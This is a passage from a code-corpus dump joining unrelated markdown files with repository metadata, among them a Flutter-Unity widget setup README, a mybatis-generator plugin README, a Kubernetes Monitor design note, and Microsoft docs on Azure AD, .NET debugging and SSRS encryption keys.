] | 226 | 2020-09-09T21:56:14.000Z | 2022-03-26T18:09:53.000Z | src/__tests__/fixtures/unfoldingWord/en_tq/hab/03/13.md | unfoldingWord/content-checker | 7b4ca10b94b834d2795ec46c243318089cc9110e | [
"MIT"
] | 1 | 2022-01-10T21:47:07.000Z | 2022-01-10T21:47:07.000Z | # Why did Yahweh go forth in his indignation?
Yahweh went forth in his indignation for the salvation of his people and his anointed one.
# Who does Yahweh shatter in his indignation?
Yahweh shatters the head of the house of the wicked.
| 29.875 | 90 | 0.782427 | eng_Latn | 0.999932 |
61b64ff8a470ffb7733dfc4a26587a2ef2d1cf59 | 900 | md | Markdown | docs/design/monitor.md | jelmersnoeck/ingress-monitor | aa9efbe279c008f60aed08e95cf8432f12541bd6 | [
"MIT"
] | 7 | 2018-10-03T04:59:51.000Z | 2020-09-07T10:02:51.000Z | docs/design/monitor.md | jelmersnoeck/ingress-monitor | aa9efbe279c008f60aed08e95cf8432f12541bd6 | [
"MIT"
] | 25 | 2018-08-29T07:08:06.000Z | 2019-03-24T17:48:29.000Z | docs/design/monitor.md | jelmersnoeck/ingress-monitor | aa9efbe279c008f60aed08e95cf8432f12541bd6 | [
"MIT"
] | 2 | 2018-10-02T16:36:01.000Z | 2019-01-18T13:52:40.000Z | # Monitor
A monitor is fairly simple as it's aim is to combine configuration objects into
a single object.
A Monitor is namespace bound, this means that the namespace you deploy it in is
where it will have impact. It won't select Ingresses from outside of that
namespace.
```yaml
# A Monitor is the glue between a MonitorTemplate, Provider and a set of
# Ingresses.
apiVersion: ingressmonitor.sphc.io/v1alpha1
kind: Monitor
metadata:
name: go-apps
namespace: websites
spec:
# Required. The Operator will fetch all Ingresses that have the given labels
# set up for the namespace this IngressMonitor lives in.
selector:
labels:
component: marketplace
# Provider is the provider we'd like to use for this Monitor.
provider:
name: prod-statuscake
# Template is the reference to the MonitorTemplate we'd like to use for this
# Monitor.
template:
name: go-apps
```
| 28.125 | 79 | 0.75 | eng_Latn | 0.999123 |
61b6c7adc9a6306b68fc85f6629459db35d9ae8b | 19,413 | md | Markdown | README.md | duytruong27/flutter-unity-view-widget | 980a435dce6f19c4a068d461a05ee687d402bd11 | [
"MIT"
] | 6 | 2020-08-12T08:56:54.000Z | 2021-06-18T07:33:47.000Z | README.md | duytruong27/flutter-unity-view-widget | 980a435dce6f19c4a068d461a05ee687d402bd11 | [
"MIT"
] | null | null | null | README.md | duytruong27/flutter-unity-view-widget | 980a435dce6f19c4a068d461a05ee687d402bd11 | [
"MIT"
] | 1 | 2020-05-18T15:03:37.000Z | 2020-05-18T15:03:37.000Z | # flutter_unity_widget
[](#contributors-)
[![version][version-badge]][package]
[![MIT License][license-badge]][license]
[![PRs Welcome][prs-badge]](http://makeapullrequest.com)
[![Watch on GitHub][github-watch-badge]][github-watch]
[![Star on GitHub][github-star-badge]][github-star]
[](https://gitter.im/flutter-unity/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)
Flutter unity 3D widget for embedding unity in flutter. Now you can make awesome gamified features of your app in Unity and get it rendered in a Flutter app both in fullscreen and embeddable mode. Works great on Android and iOS. There are now two unity app examples in the unity folder, one with the default scene and another based on Unity AR foundation samples.
<br />
<br />
Note: I have updated the example for Unity 2019.3.5 and there are some new changes in the scripts folder. Please replace your already copied files and folders in your unity project
## Installation
First depend on the library by adding this to your packages `pubspec.yaml`:
```yaml
dependencies:
flutter_unity_widget: ^0.1.6+8
```
Now inside your Dart code you can import it.
```dart
import 'package:flutter_unity_widget/flutter_unity_widget.dart';
```
<br />
## Preview
30 fps gifs, showcasing communication between Flutter and Unity:


<br />
## Setup Project
For this, there is also a video tutorial, which you can find a [here](https://www.youtube.com/watch?v=exNPmv_7--Q).
### Add Unity Project
1. Create an unity project, Example: 'UnityDemoApp'.
2. Create a folder named `unity` in flutter project folder.
2. Move unity project folder to `unity` folder.
Now your project files should look like this.
```
.
├── android
├── ios
├── lib
├── test
├── unity
│ └── <Your Unity Project> // Example: UnityDemoApp
├── pubspec.yml
├── README.md
```
### Configure Player Settings
1. First Open Unity Project.
2. Click Menu: File => Build Settings
Be sure you have at least one scene added to your build.
3. => Player Settings
**Android Platform**:
1. Make sure your `Graphics APIs` are set to OpenGLES3 with a fallback to OpenGLES2 (no Vulkan)
2. Change `Scripting Backend` to IL2CPP.
3. Mark the following `Target Architectures` :
- ARMv7 ✅
- ARM64 ✅
- x86 ✅ (In Unity Version 2019.2+, this feature is not avaliable due to the lack of Unity Official Support)
<img src="https://raw.githubusercontent.com/snowballdigital/flutter-unity-view-widget/master/Screenshot%202019-03-27%2007.31.55.png" width="400" />
**iOS Platform**:
1. This only works with Unity version >=2019.3 because uses Unity as a library!
2. Depending on where you want to test or run your app, (simulator or physical device), you should select the appropriate SDK on `Target SDK`.
<br />
<br />
### Add Unity Build Scripts and Export
Copy [`Build.cs`](https://github.com/snowballdigital/flutter-unity-view-widget/tree/master/scripts/unity_2019_3_5_later/Editor/Build.cs) and [`XCodePostBuild.cs`](https://github.com/snowballdigital/flutter-unity-view-widget/tree/master/scripts/unity_2019_3_5_later/Editor/XCodePostBuild.cs) to `unity/<Your Unity Project>/Assets/Scripts/Editor/`
Open your unity project in Unity Editor. Now you can export the Unity project with `Flutter/Export Android` (for Unity versions up to 2019.2), `Flutter/Export Android (Unity 2019.3.*)` (for Unity versions 2019.3 and up, which uses the new [Unity as a Library](https://blogs.unity3d.com/2019/06/17/add-features-powered-by-unity-to-native-mobile-apps/) export format), or `Flutter/Export IOS` menu.
<img src="https://github.com/snowballdigital/flutter-unity-view-widget/blob/master/Screenshot%202019-03-27%2008.13.08.png?raw=true" width="400" />
Android will export unity project to `android/UnityExport`.
IOS will export unity project to `ios/UnityExport`.
<br />
**Android Platform Only**
1. After exporting the unity game, open Android Studio and and add the `Unity Classes` Java `.jar` file as a module to the unity project. You just need to do this once if you are exporting from the same version of Unity everytime. The `.jar` file is located in the ```<Your Flutter Project>/android/UnityExport/lib``` folder
2. Add the following to your ```<Your Flutter Project>/android/settings.gradle```file:
```gradle
include ":UnityExport"
project(":UnityExport").projectDir = file("./UnityExport")
```
3. If using Unity 2019.2 or older, open `build.gradle` of `UnityExport` module and replace the dependencies with
```gradle
dependencies {
implementation project(':unity-classes') // the unity classes module you added from step 1
}
```
4. To build a release package, you need to add signconfig in `UnityExport/build.gradle`. The code below use the `debug` signConfig for all buildTypes, which can be changed as you well if you need specify signConfig.
```
buildTypes {
release {
signingConfig signingConfigs.debug
}
debug {
signingConfig signingConfigs.debug
}
profile{
signingConfig signingConfigs.debug
}
innerTest {
//...
matchingFallbacks = ['debug', 'release']
}
}
```
5. If you found the duplicate app icons on your launcher after installing the app, you can just open `UnityExport` Manifest file and comment the codes below
```gradle
<activity android:name="com.unity3d.player.UnityPlayerActivity" android:theme="@style/UnityThemeSelector" android:screenOrientation="fullSensor" android:launchMode="singleTask" android:configChanges="mcc|mnc|locale|touchscreen|keyboard|keyboardHidden|navigation|orientation|screenLayout|uiMode|screenSize|smallestScreenSize|fontScale|layoutDirection|density" android:hardwareAccelerated="false">
// <intent-filter>
// <action android:name="android.intent.action.MAIN" />
// <category android:name="android.intent.category.LAUNCHER" />
// <category android:name="android.intent.category.LEANBACK_LAUNCHER" />
// </intent-filter>
<meta-data android:name="unityplayer.UnityActivity" android:value="true" />
</activity>
```
**iOS Platform Only**
1. open your ios/Runner.xcworkspace (workspace!, not the project) in Xcode and add the exported project in the workspace root (with a right click in the Navigator, not on an item -> Add Files to “Runner” -> add the UnityExport/Unity-Iphone.xcodeproj file
<img src="workspace.png" width="400" />
2. Select the Unity-iPhone/Data folder and change the Target Membership for Data folder to UnityFramework
<img src="change_target_membership_data_folder.png" width="400" />
3. Add this to your Runner/Runner/Runner-Bridging-Header.h
```c
#import "UnityUtils.h"
```
4. Add to Runner/Runner/AppDelegate.swift before the GeneratedPluginRegistrant call:
```swift
InitArgs(CommandLine.argc, CommandLine.unsafeArgv)
```
Or when using Objective-C your `main.m` should look like this:
```
#import "UnityUtils.h"
int main(int argc, char * argv[]) {
@autoreleasepool {
InitArgs(argc, argv);
return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
}
}
```
5. Opt-in to the embedded views preview by adding a boolean property to the app's `Info.plist` file with the key `io.flutter.embedded_views_preview` and the value `YES`.
6. Add UnityFramework.framework as a Library to the Runner project
<img src="libraries.png" width="400" />
<br />
### AR Foundation ( requires Unity 2019.3.*)

Check out the Unity AR Foundation Samples [Demo Repository](https://github.com/juicycleff/flutter-unity-arkit-demo)
**The Demo Repository is not guaranteed to be up-to-date with the latest flutter-unity-view-widget master. Make sure to follow the steps listed below for setting up AR Foundation on iOS and Android in your projects.**
**iOS**
Go to target info list on Xcode and add this key and value;
key: `Privacy - Camera Usage Description` value: `$(PRODUCT_NAME) uses Cameras`
**Android**
If you want to use Unity for integrating Augmented Reality in your Flutter app, a few more changes are required:
1. Export the Unity Project as previously stated (using the Editor Build script).
2. Check if the exported project includes all required Unity libraries (.so) files (`lib/\<architecture\>/libUnityARCore.so` and `libarpresto_api.so`). There seems to be a bug where a Unity export does not include all lib files. If they are missing, use Unity to build a standalone .apk of your AR project, unzip the resulting apk, and copy over the missing .lib files to the `UnityExport` module.
3. Similar to how you've created the `unity-classes` module in Android Studio, create similar modules for all exported .aar and .jar files in the `UnityExport/libs` folder (`arcore_client.aar`, `unityandroidpermissions.aar`, `UnityARCore.aar`).
4. Update the build.gradle script of the `UnityExport` module to depend on the new modules (again, similar to how it depends on `unity-classes`).
5. Finally, update your Dart code build method where you include the `UnityWidget` and add `isARScene: true,`.
Sadly, this does have the side effect of making your Flutter activity act in full screen, as Unity requires control of your Activity for running in AR, and it makes several modifications to your Activity as a result (including setting it to full screen).
### Add UnityMessageManager Support
Copy [`UnityMessageManager.cs`](https://github.com/snowballdigital/flutter-unity-view-widget/tree/master/scripts/unity_2019_3_5_later/UnityMessageManager.cs) to your unity project.
Copy this folder [`JsonDotNet`](https://github.com/snowballdigital/flutter-unity-view-widget/tree/master/scripts/unity_2019_3_5_later/JsonDotNet) to your unity project.
Copy [`link.xml`](https://github.com/snowballdigital/flutter-unity-view-widget/tree/master/scripts/unity_2019_3_5_later/link.xml) to your unity project.
(2019.3.5* only) Copy this folder [`Plugins`](https://github.com/snowballdigital/flutter-unity-view-widget/tree/master/scripts/unity_2019_3_5_later/Plugins) to your unity project.
<br />
### Vuforia
**Android**
Similar to setting up AR Foundation, but creating a module for the VuforiaWrapper instead.
Thanks to [@PiotrxKolasinski](https://github.com/PiotrxKolasinski) for writing down the exact steps:
1. Change in build.gradle: `implementation(name: 'VuforiaWrapper', ext:'aar')` to `implementation project(':VuforiaWrapper')`
2. In settings.gradle in the first line at the end add: `':VuforiaWrapper'`
3. From menu: File -> New -> New Module choose "import .JAR/.AAR Package" and add lib VuforiaWrapper.arr. Move generated folder to android/
4. In Widget UnityWidget add field: `isARScene: true`
5. Your App need camera permission (you can set in settings on mobile)
## Examples
### Simple Example
```dart
import 'package:flutter/material.dart';
import 'package:flutter/services.dart';
import 'package:flutter_unity_widget/flutter_unity_widget.dart';
class UnityDemoScreen extends StatefulWidget {
UnityDemoScreen({Key key}) : super(key: key);
@override
_UnityDemoScreenState createState() => _UnityDemoScreenState();
}
class _UnityDemoScreenState extends State<UnityDemoScreen>{
static final GlobalKey<ScaffoldState> _scaffoldKey =
GlobalKey<ScaffoldState>();
UnityWidgetController _unityWidgetController;
Widget build(BuildContext context) {
return Scaffold(
key: _scaffoldKey,
body: SafeArea(
bottom: false,
child: WillPopScope(
onWillPop: () {
// Pop the category page if Android back button is pressed.
},
child: Container(
color: colorYellow,
child: UnityWidget(
onUnityViewCreated: onUnityCreated,
),
),
),
),
);
}
// Callback that connects the created controller to the unity controller
void onUnityCreated(controller) {
this._unityWidgetController = controller;
}
}
```
<br />
### Communicating with and from Unity
```dart
import 'package:flutter/material.dart';
import 'package:flutter_unity_widget/flutter_unity_widget.dart';
void main() => runApp(MyApp());
class MyApp extends StatefulWidget {
@override
_MyAppState createState() => _MyAppState();
}
class _MyAppState extends State<MyApp> {
static final GlobalKey<ScaffoldState> _scaffoldKey =
GlobalKey<ScaffoldState>();
UnityWidgetController _unityWidgetController;
double _sliderValue = 0.0;
@override
void initState() {
super.initState();
}
@override
Widget build(BuildContext context) {
return MaterialApp(
home: Scaffold(
key: _scaffoldKey,
appBar: AppBar(
title: const Text('Unity Flutter Demo'),
),
body: Card(
margin: const EdgeInsets.all(8),
clipBehavior: Clip.antiAlias,
shape: RoundedRectangleBorder(
borderRadius: BorderRadius.circular(20.0),
),
child: Stack(
children: <Widget>[
UnityWidget(
onUnityViewCreated: onUnityCreated,
isARScene: false,
onUnityMessage: onUnityMessage,
),
Positioned(
bottom: 20,
left: 20,
right: 20,
child: Card(
elevation: 10,
child: Column(
children: <Widget>[
Padding(
padding: const EdgeInsets.only(top: 20),
child: Text("Rotation speed:"),
),
Slider(
onChanged: (value) {
setState(() {
_sliderValue = value;
});
setRotationSpeed(value.toString());
},
value: _sliderValue,
min: 0,
max: 20,
),
],
),
),
),
],
),
),
),
);
}
// Communcation from Flutter to Unity
void setRotationSpeed(String speed) {
_unityWidgetController.postMessage(
'Cube',
'SetRotationSpeed',
speed,
);
}
// Communication from Unity to Flutter
void onUnityMessage(controller, message) {
print('Received message from unity: ${message.toString()}');
}
// Callback that connects the created controller to the unity controller
void onUnityCreated(controller) {
this._unityWidgetController = controller;
}
}
```
## API
- `pause()` (Use this to pause unity player)
- `resume()` (Use this to resume unity player)
- `postMessage(String gameObject, methodName, message)` (Allows you invoke commands in Unity from flutter)
- `onUnityMessage(data)` (Unity to flutter bindding and listener)
## Known issues
- Android Export requires several manual changes
- Using AR will make the activity run in full screen (hiding status and navigation bar).
[version-badge]: https://img.shields.io/pub/v/flutter_unity_widget.svg?style=flat-square
[package]: https://pub.dartlang.org/packages/flutter_unity_widget/
[license-badge]: https://img.shields.io/github/license/snowballdigital/flutter-unity-view-widget.svg?style=flat-square
[license]: https://github.com/snowballdigital/flutter-unity-view-widget/blob/master/LICENSE
[prs-badge]: https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square
[prs]: http://makeapullrequest.com
[github-watch-badge]: https://img.shields.io/github/watchers/snowballdigital/flutter-unity-view-widget.svg?style=social
[github-watch]: https://github.com/snowballdigital/flutter-unity-view-widget/watchers
[github-star-badge]: https://img.shields.io/github/stars/snowballdigital/flutter-unity-view-widget.svg?style=social
[github-star]: https://github.com/snowballdigital/flutter-unity-view-widget/stargazers
## Contributors ✨
Thanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)):
<!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section -->
<!-- prettier-ignore-start -->
<!-- markdownlint-disable -->
<table>
<tr>
<td align="center"><a href="https://www.xraph.com"><img src="https://avatars2.githubusercontent.com/u/11243590?v=4" width="100px;" alt="Rex Raphael"/><br /><sub><b>Rex Raphael</b></sub></a><br /><a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=juicycleff" title="Code">💻</a> <a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=juicycleff" title="Documentation">📖</a> <a href="#question-juicycleff" title="Answering Questions">💬</a> <a href="https://github.com/snowballdigital/flutter-unity-view-widget/issues?q=author%3Ajuicycleff" title="Bug reports">🐛</a> <a href="#review-juicycleff" title="Reviewed Pull Requests">👀</a> <a href="#tutorial-juicycleff" title="Tutorials">✅</a></td>
<td align="center"><a href="https://stockxit.com"><img src="https://avatars1.githubusercontent.com/u/1475368?v=4" width="100px;" alt="Thomas Stockx"/><br /><sub><b>Thomas Stockx</b></sub></a><br /><a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=thomas-stockx" title="Code">💻</a> <a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=thomas-stockx" title="Documentation">📖</a> <a href="#question-thomas-stockx" title="Answering Questions">💬</a> <a href="#tutorial-thomas-stockx" title="Tutorials">✅</a></td>
<td align="center"><a href="http://krispypen.github.io/"><img src="https://avatars1.githubusercontent.com/u/156955?v=4" width="100px;" alt="Kris Pypen"/><br /><sub><b>Kris Pypen</b></sub></a><br /><a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=krispypen" title="Code">💻</a> <a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=krispypen" title="Documentation">📖</a> <a href="#question-krispypen" title="Answering Questions">💬</a> <a href="#tutorial-krispypen" title="Tutorials">✅</a></td>
<td align="center"><a href="https://github.com/lorant-csonka-planorama"><img src="https://avatars2.githubusercontent.com/u/48209860?v=4" width="100px;" alt="Lorant Csonka"/><br /><sub><b>Lorant Csonka</b></sub></a><br /><a href="https://github.com/snowballdigital/flutter-unity-view-widget/commits?author=lorant-csonka-planorama" title="Documentation">📖</a> <a href="#video-lorant-csonka-planorama" title="Videos">📹</a></td>
</tr>
</table>
<!-- markdownlint-enable -->
<!-- prettier-ignore-end -->
<!-- ALL-CONTRIBUTORS-LIST:END -->
This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind welcome!
| 45.357477 | 756 | 0.702931 | eng_Latn | 0.632029 |
61b70dea7e134fc272997fc9471df49578e898c9 | 993 | md | Markdown | articles/active-directory/develop/GuidedSetups/active-directory-mobileanddesktopapp-windowsdesktop-configure-arp.md | quique-z/azure-docs | b0cd9cf3857bef92a706920f4435fe698dd28bcf | [
"CC-BY-4.0",
"MIT"
] | 2 | 2021-09-19T19:07:44.000Z | 2021-11-15T09:58:47.000Z | articles/active-directory/develop/GuidedSetups/active-directory-mobileanddesktopapp-windowsdesktop-configure-arp.md | quique-z/azure-docs | b0cd9cf3857bef92a706920f4435fe698dd28bcf | [
"CC-BY-4.0",
"MIT"
] | 1 | 2017-04-21T17:57:59.000Z | 2017-04-21T17:58:30.000Z | articles/active-directory/develop/GuidedSetups/active-directory-mobileanddesktopapp-windowsdesktop-configure-arp.md | quique-z/azure-docs | b0cd9cf3857bef92a706920f4435fe698dd28bcf | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-08-20T00:51:14.000Z | 2020-08-20T00:51:14.000Z | ---
title: Azure AD v2 Windows Desktop Getting Started - Config | Microsoft Docs
description: How a Windows Desktop .NET (XAML) application can get an access token and call an API protected by Azure Active Directory v2 endpoint.
services: active-directory
documentationcenter: dev-center-name
author: andretms
manager: CelesteDG
editor: ''
ms.assetid: 820acdb7-d316-4c3b-8de9-79df48ba3b06
ms.service: active-directory
ms.subservice: develop
ms.devlang: na
ms.topic: conceptual
ms.tgt_pltfrm: na
ms.workload: identity
ms.date: 01/29/2020
ms.author: ryanwi
ms.custom: aaddev
---
# Add the application’s registration information to your app
In this step, you need to add the Application Id to your project.
1. Open `App.xaml.cs` and replace the line containing the `ClientId` with:
```csharp
private static string ClientId = "[Enter the application Id here]";
```
### What is Next
[!INCLUDE [Test and Validate](../../../../includes/active-directory-develop-guidedsetup-windesktop-test.md)]
| 29.205882 | 147 | 0.766365 | eng_Latn | 0.87098 |
61b71ef3ed526cd58068b5f6629b6a9bc67f14e1 | 770 | md | Markdown | dynamicsax2012-technet/exceptional-threshold.md | RobinARH/DynamicsAX2012-technet | d0d0ef979705b68e6a8406736612e9fc3c74c871 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | dynamicsax2012-technet/exceptional-threshold.md | RobinARH/DynamicsAX2012-technet | d0d0ef979705b68e6a8406736612e9fc3c74c871 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | dynamicsax2012-technet/exceptional-threshold.md | RobinARH/DynamicsAX2012-technet | d0d0ef979705b68e6a8406736612e9fc3c74c871 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: " exceptional threshold"
TOCTitle: " exceptional threshold"
ms:assetid: DynamicsAXGlossary.2014269
ms:mtpsurl: https://technet.microsoft.com/en-us/library/dynamicsaxglossary.2014269(v=AX.60)
ms:contentKeyID: 62830105
ms.date: 08/25/2014
mtps_version: v=AX.60
f1_keywords:
- Glossary.exceptional threshold
---
# exceptional threshold
The maximum limit of an individual transaction value that is a part of a cumulative transaction value, up to which a tax on the transaction value is not calculated. The exceptional threshold is applied to an individual transaction value that is a part of a cumulative transaction value that is within the cumulative threshold.
## See also
[Microsoft Dynamics AX glossary](glossary/microsoft-dynamics-ax-glossary.md)
| 32.083333 | 326 | 0.797403 | eng_Latn | 0.951249 |
61b75500f3fb4f193f4361dd94d09fcd776dc63f | 353 | md | Markdown | docs/api/alfa-css.token_namespace.isstring_variable.md | Siteimprove/alfa | 3eb032275a9fa5f3b97b892e28ebfc90eb4ef611 | [
"MIT"
] | 70 | 2018-05-25T16:02:23.000Z | 2022-03-21T14:28:03.000Z | docs/api/alfa-css.token_namespace.isstring_variable.md | Siteimprove/alfa | 3eb032275a9fa5f3b97b892e28ebfc90eb4ef611 | [
"MIT"
] | 448 | 2018-06-01T08:46:47.000Z | 2022-03-31T14:02:55.000Z | docs/api/alfa-css.token_namespace.isstring_variable.md | Siteimprove/alfa | 3eb032275a9fa5f3b97b892e28ebfc90eb4ef611 | [
"MIT"
] | 13 | 2018-07-04T19:47:49.000Z | 2022-02-19T09:59:34.000Z | <!-- Do not edit this file. It is automatically generated by API Documenter. -->
[Home](./index.md) > [@siteimprove/alfa-css](./alfa-css.md) > [Token](./alfa-css.token_namespace.md) > [isString](./alfa-css.token_namespace.isstring_variable.md)
## Token.isString variable
<b>Signature:</b>
```typescript
isString: typeof String.isString
```
| 29.416667 | 171 | 0.708215 | eng_Latn | 0.349953 |
61b760fcc028744f73e6fb0519194d30925ba78a | 2,375 | md | Markdown | README.md | mask-zpt/mybatis-generator-plugins | 8e1c002c8282a3209f549d3e4602be4259c84547 | [
"BSD-3-Clause"
] | null | null | null | README.md | mask-zpt/mybatis-generator-plugins | 8e1c002c8282a3209f549d3e4602be4259c84547 | [
"BSD-3-Clause"
] | null | null | null | README.md | mask-zpt/mybatis-generator-plugins | 8e1c002c8282a3209f549d3e4602be4259c84547 | [
"BSD-3-Clause"
] | 1 | 2021-01-29T07:59:15.000Z | 2021-01-29T07:59:15.000Z | # myBatisGeneratorPlugins
一些mybatis-generator扩展插件集合
#### 已实现功能
- 自动添加swagger2注解到实体类
- 扩展set方法,返回this实例;方便链式调用
#### maven引用
```xml
<!-- https://mvnrepository.com/artifact/com.github.misterchangray.mybatis.generator.plugins/myBatisGeneratorPlugins -->
<dependency>
<groupId>com.github.misterchangray.mybatis.generator.plugins</groupId>
<artifactId>myBatisGeneratorPlugins</artifactId>
<version>1.2</version>
</dependency>
```
-----------------------------------------------
### 详细介绍
#### 1. 自动添加swagger2注解到实体类
自动为`entity`类生成`swagger2`文档注解,注解内容为数据库`comment`内容
``` xml
<!-- 自动为entity生成swagger2文档-->
<plugin type="mybatis.generator.plugins.GeneratorSwagger2Doc">
<property name="apiModelAnnotationPackage" value="io.swagger.annotations.ApiModel" />
<property name="apiModelPropertyAnnotationPackage" value="io.swagger.annotations.ApiModelProperty" />
</plugin>
```
#### 2.扩展entity的`set`方法
扩展entity的`set`方法;返回当前`this`实例,方便链式调用
``` xml
<!-- 扩展entity的set方法-->
<plugin type="mybatis.generator.plugins.ExtendEntitySetter" />
```
-------------------------------------------------
#### 怎么引入到项目中
增加依赖到你的pom.xml文件 mybatis 节点下,如下:<br>
add dependency to your pom.xml on mybatis node. like:
``` xml
<!-- maven -->
<build>
<finalName>common-core</finalName>
<!-- ... -->
<plugins>
<!--mybatis 逆向工程插件-->
<plugin>
<groupId>org.mybatis.generator</groupId>
<artifactId>mybatis-generator-maven-plugin</artifactId>
<version>1.3.5</version>
<configuration>
<verbose>true</verbose>
<overwrite>true</overwrite>
</configuration>
<dependencies>
<!-- use plugin -->
<!-- https://mvnrepository.com/artifact/com.github.misterchangray.mybatis.generator.plugins/myBatisGeneratorPlugins -->
<dependency>
<groupId>com.github.misterchangray.mybatis.generator.plugins</groupId>
<artifactId>myBatisGeneratorPlugins</artifactId>
<version>1.2</version>
</dependency>
</dependencies>
</plugin>
</plugins>
</build>
```
-------------------------------------
#### runtime environment
- OS Microsoft Windows 10 Pro
- Java 8
- springMVC 4.3
- Mybitis 3.4
- Mysql 5.5.50
- Restful interface
- Maven 3.5.3
- Git 2.14.1
- Swagger 2.6.1
| 26.388889 | 129 | 0.617684 | yue_Hant | 0.227719 |
61b7e0719fd9f1a8fd700dcea5db266634d91c18 | 1,702 | md | Markdown | docs/framework/unmanaged-api/debugging/icorpublish-interface.md | mtorreao/docs.pt-br | e080cd3335f777fcb1349fb28bf527e379c81e17 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/unmanaged-api/debugging/icorpublish-interface.md | mtorreao/docs.pt-br | e080cd3335f777fcb1349fb28bf527e379c81e17 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/unmanaged-api/debugging/icorpublish-interface.md | mtorreao/docs.pt-br | e080cd3335f777fcb1349fb28bf527e379c81e17 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Interface ICorPublish
ms.date: 03/30/2017
api_name:
- ICorPublish
api_location:
- mscordbi.dll
api_type:
- COM
f1_keywords:
- ICorPublish
helpviewer_keywords:
- ICorPublish interface [.NET Framework debugging]
ms.assetid: 87c4fcb2-7703-4a2e-afb6-42973381b960
topic_type:
- apiref
ms.openlocfilehash: 3ff4efe8b3e2932da7f65246bf4ad614a4dd86cd
ms.sourcegitcommit: d8020797a6657d0fbbdff362b80300815f682f94
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 11/24/2020
ms.locfileid: "95694393"
---
# <a name="icorpublish-interface"></a>Interface ICorPublish
O serve como interface geral para publicar informações sobre processos e informações sobre os domínios de aplicativo nesses processos.
## <a name="methods"></a>Métodos
|Método|DESCRIÇÃO|
|------------|-----------------|
|[Método EnumProcesses](icorpublish-enumprocesses-method.md)|Obtém uma instância de [ICorPublishProcessEnum](icorpublishprocessenum-interface.md) que contém os processos gerenciados em execução neste computador.|
|[Método GetProcess](icorpublish-getprocess-method.md)|Obtém uma instância de [ICorPublishProcess](icorpublishprocess-interface.md) que representa o processo com o identificador especificado.|
## <a name="requirements"></a>Requisitos
**Plataformas:** confira [Requisitos do sistema](../../get-started/system-requirements.md).
**Cabeçalho:** CorPub. idl, CorPub. h
**Biblioteca:** CorGuids.lib
**.NET Framework versões:**[!INCLUDE[net_current_v10plus](../../../../includes/net-current-v10plus-md.md)]
## <a name="see-also"></a>Confira também
- [Depurando interfaces](debugging-interfaces.md)
- [Coclass CorpubPublish](corpubpublish-coclass.md)
| 34.734694 | 214 | 0.754994 | por_Latn | 0.606144 |
61b7e669edcb507f429872feebea59e469ec854b | 8,592 | md | Markdown | docs/reporting-services/install-windows/ssrs-encryption-keys-delete-and-re-create-encryption-keys.md | cawrites/sql-docs | 58158eda0aa0d7f87f9d958ae349a14c0ba8a209 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-05-07T19:40:49.000Z | 2020-09-19T00:57:12.000Z | docs/reporting-services/install-windows/ssrs-encryption-keys-delete-and-re-create-encryption-keys.md | cawrites/sql-docs | 58158eda0aa0d7f87f9d958ae349a14c0ba8a209 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/reporting-services/install-windows/ssrs-encryption-keys-delete-and-re-create-encryption-keys.md | cawrites/sql-docs | 58158eda0aa0d7f87f9d958ae349a14c0ba8a209 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-03-11T20:30:39.000Z | 2020-05-07T19:40:49.000Z | ---
title: "Delete and Recreate Encryption Keys (Configuration Manager) | Microsoft Docs"
description: "Deleting and recreating encryption keys are activities that fall outside of routine encryption key maintenance."
ms.date: 12/04/2019
ms.prod: reporting-services
ms.prod_service: "reporting-services-native"
ms.custom: seo-lt-2019, seo-mmd-2019
ms.topic: conceptual
helpviewer_keywords:
- "recreating encryption keys"
- "encryption keys [Reporting Services]"
- "deleting encryption keys"
- "symmetric keys [Reporting Services]"
- "removing encryption keys"
- "resetting encryption keys"
ms.assetid: 201afe5f-acc9-4a37-b5ec-121dc7df2a61
author: maggiesMSFT
ms.author: maggies
---
# Delete and Recreate Encryption Keys (SSRS Configuration Manager)
Deleting and recreating encryption keys are activities that fall outside of routine encryption key maintenance. You perform these tasks in response to a specific threat to your report server, or as a last resort when you can no longer access a report server database.
- Recreate the symmetric key when you believe the existing symmetric key is compromised. You can also recreate the key on a regular basis as a security best practice.
- Delete existing encryption keys and unusable encrypted content when you cannot restore the symmetric key.
## Recreating Encryption Keys
If you have evidence that the symmetric key is known to unauthorized users, or if your report server has been under attack and you want to reset the symmetric key as a precaution, you can recreate the symmetric key. When you recreate the symmetric key, all encrypted values will be re-encrypted using the new value. If you are running multiple report servers in a scale-out deployment, all copies of the symmetric key will be updated to the new value. The report server uses the public keys available to it to update the symmetric key for each server in the deployment.
You can only recreate the symmetric key when the report server is in a working state. Recreating the encryption keys and re-encrypting content disrupts server operations. You must take the server offline while re-encryption is underway. There should be no requests made to the report server during re-encryption.
You can use the Reporting Services Configuration tool or the **rskeymgmt** utility to reset the symmetric key and encrypted data. For more information about how the symmetric key is created, see [Initialize a Report Server (SSRS Configuration Manager)](../../reporting-services/install-windows/ssrs-encryption-keys-initialize-a-report-server.md).
### How to recreate encryption keys (Reporting Services Configuration Tool)
1. Disable the Report Server Web service and HTTP access by modifying the **IsWebServiceEnabled** property in the rsreportserver.config file. This step temporarily stops authentication requests from being sent to the report server without completely shutting down the server. You must have minimal service so that you can recreate the keys.
If you are recreating encryption keys for a report server scale-out deployment, disable this property on all instances in the deployment.
